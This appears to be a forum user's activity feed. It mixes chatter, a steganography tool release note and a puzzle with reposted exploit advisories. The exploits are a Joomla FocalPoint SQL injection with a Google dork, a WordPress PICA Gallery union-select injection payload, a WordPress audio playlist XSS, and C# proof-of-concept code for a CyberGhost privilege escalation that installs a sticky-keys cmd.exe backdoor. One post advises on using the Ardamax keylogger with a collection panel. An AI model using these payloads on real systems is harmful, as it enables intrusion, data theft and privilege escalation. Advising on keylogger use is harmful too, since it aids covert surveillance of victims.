KhiZaRix last won the day on March 26 2015

  1. Welcome, like for the introduction.
  2. I was sure =))) I spent some time around Slatina.
  3. Joomla FocalPoint component version 1.2.3 suffers from a remote SQL injection vulnerability.

     # Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection
     # Date: 2017-03-23
     # Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/
     # Exploit Author: Persian Hack Team
     # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
     # Home : http://persian-team.ir/
     # Google Dork : inurl:index.php?option=com_focalpoint
     # Telegram Channel AND Demo: @PersianHackTeam
     # Tested on: WIN
     # POC :
     id Parameter Vulnerable to SQL Injection
     Put a String Value in id Parameter
     http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135
     # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
     # Iranian White Hat Hackers

     Source: https://packetstormsecurity.com/files/141793/Joomla-FocalPoint-1.2.3-SQL-Injection.html
  4. Which city? It looks very familiar.
  5. Okay, when it ends, that is on Thursday, I will contact you and explain.
  6. Stegano 0.6.9 Changes: Introduces some type hints (PEP 484). More tests for the generators and for the tools module. Updated descriptions of generators. Fixed a bug with a generator that has been previously renamed. Download: https://packetstormsecurity.com/files/download/141598/Stegano-0.6.9.tar.gz
  7. Hi, I will contact you in private and explain.
  8. CODE :

     # # # # #
     # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
     # Google Dork: N/A
     # Date: 09.03.2017
     # Vendor Homepage: https://www.apptha.com/
     # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
     # Demo: http://www.apptha.com/demo/pica-photo-gallery
     # Version: 1.0
     # Tested on: Win7 x64, Kali Linux x64
     # # # # #
     # Exploit Author: Ihsan Sencan
     # Author Web: http://ihsan.net
     # Author Mail : ihsan[@]ihsan[.]net
     # # # # #
     # SQL Injection/Exploit :
     # http://localhost/[PATH]/?aid=[SQL]
     # For example;
     # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
     # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
     # Etc..
     # # # # #

     Source: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html
  9. Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information. Changes: Fixed an error when revealing a hidden binary file in an image. Download: https://packetstormsecurity.com/files/download/141562/Stegano-0.6.8.tar.gz Source: https://packetstormsecurity.com/files/141562/Stegano-0.6.8.html
  10. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability.

     CODE:

     ------------------------------------------------------------------------
     WordPress audio playlist functionality is affected by Cross-Site Scripting
     ------------------------------------------------------------------------
     Yorick Koster, July 2016

     ------------------------------------------------------------------------
     Abstract
     ------------------------------------------------------------------------
     Two Cross-Site Scripting vulnerabilities exist in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode.

     ------------------------------------------------------------------------
     OVE ID
     ------------------------------------------------------------------------
     OVE-20160717-0003

     ------------------------------------------------------------------------
     Tested versions
     ------------------------------------------------------------------------
     This issue was successfully tested on the WordPress version 4.5.3.

     ------------------------------------------------------------------------
     Fix
     ------------------------------------------------------------------------
     These issues are resolved in WordPress version 4.7.3.

     ------------------------------------------------------------------------
     Details
     ------------------------------------------------------------------------
     https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html

     It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator).

     The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting.

     The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render an audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability.

     Proof of concept

     The following MP3 file can be used to reproduce this issue:
     https://securify.nl/advisory/SFY20160742/xss.mp3

     1) upload MP3 file to the Media Library (as Editor or Administrator).
     2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist).

     ------------------------------------------------------------------------
     Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.

     Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
  11. # Exploit CyberGhost Privilege Escalation
     # Date: 06.03.2017
     # Software Link: http://www.cyberghostvpn.com/
     # Exploit Author: Kacper Szurek
     # Contact: https://twitter.com/KacperSzurek
     # Website: https://security.szurek.pl/
     # Category: local

     1. Description

     `CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.

     https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html

     2. Proof of Concept

     using System;
     using CyberGhost.Communication;

     namespace cyber
     {
         class Program
         {
             static void Main(string[] args)
             {
                 Console.WriteLine("CyberGhost Privilege Escalation");
                 Console.WriteLine("by Kacper Szurek");
                 Console.WriteLine("http://security.szurek.pl/");
                 Console.WriteLine("https://twitter.com/KacperSzurek");
                 PeLauncherOptions options = new PeLauncherOptions();
                 options.ExecuteableName = "sethc.exe";
                 options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
                 EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
                 CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
                 Console.WriteLine("Now logout and then press SHIFT key 5 times");
             }
         }
     }

     Source: https://packetstormsecurity.com/files/141455/CyberGhost-
  12. @NickyRo As far as I knew, Ardamax was good. But I would recommend that you don't play with fire. And regarding email, I wouldn't recommend email, but rather a panel of some kind.
  13. https://gyazo.com/55dca29bc0759fe726411422c1062bf5

     Not much empty talk, just a bit of a brain-teaser. It took me about an hour to build and test everything.

     Difficulty: Moderate
     Reward: 404
     HINT: The rays of light were stopped by Caesar.
     For small hints, PM me. Good luck.
     Ends on: 16.03.2017
     Solved by: #1 @u0m3 #2 @Usr6 #3 @new_luca #4 @Hertz